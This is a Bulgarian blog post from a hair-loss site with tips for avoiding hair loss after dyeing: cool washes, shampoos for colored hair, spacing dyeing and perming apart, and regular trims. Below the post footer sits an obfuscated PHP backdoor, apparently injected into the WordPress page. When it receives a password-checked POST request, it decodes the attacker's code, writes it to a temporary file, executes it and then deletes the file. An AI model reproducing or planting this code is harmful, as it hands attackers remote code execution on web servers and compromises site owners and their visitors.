Как да се предпазим от косопад след боядисване | Косопад

Косопад от боядисване – как да го избегнем

Как да се предпазим от косопад след боядисване

косопад от боядисване

Косопад от боядисване

Когато боядисвате косата си, на практика я подлагате на сложен химически процес. Смяната на цвета от кестеняво в платинено русо наистина може да е ефектно и секси, но в същото време изтощава и изсушава космите. Това, в комбинация с другите елементи на стрес в ежедневието може да предизвика неочакван косопад, поднасяйки супер неприятна изненада.

Въпреки твърденията на производителите, че боите са безопасни за употреба, те съдържат голям процент силни и вредни химикали. Най – засегнатата част е епидермиса или външната мантия на косъма. Веднъж разрушена, обвивката няма как да изпълнява защитните си функции и за химикалите вече не представлява трудност да проникнат до вътрешната част. Ако все пак искате да се боядисвате, трябва да се отнасяте с подходящо старание, полагайки определени грижи срещу косопад.

Един от смъртните грехове в грижите за косата е съчетанието на боядисване с химическо къдрене или изправяне. В случай, че сте достатъчно непредпазливи да се подложите на двете операции в кратък период, има огромна възможност да изгорите косата си и това да доведе до обилен косопад. Специалистите препоръчват да изчакате минимум две седмици между двете процедури, защото иначе ще изтощите космите и те ще станат силно чупливи.

косопад от боядисване

Как да избегнем косопад от боядисване

Къпете се винаги с хладка или студена вода. Горещата вана може да отмие новия цвят, особено ако боята е с ниско качество. Освен това, топлата вода изсмуква и малкото останала влага, от третираните с химикали кичури.

Препоръчително е да използвате специалните шампоани и балсами за боядисани коси, които ще намерите в търговската мрежа. Те съдържат в себе си специална формула, която подхранва и са създадени в името на грижата за вашето здраве. Подходящият балсам след баня ще задържи нивото на влага в по – големи количества и ще предпази от косопад.

Редовното подстригване или филиране също предотвратява появата на косопад. Просто не забравяйте, че боядисването подлага косата на страхотен стрес и винаги съществува опасност от косопад. Подрязвайте редовно краищата и така не само ще имате здрава коса, но и на самите вас ще ви е по – лесно да се грижите за нея.

27. март 2013 21:36:42 от Косопад
Категории: Любопитно за косопада | Етикети: , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}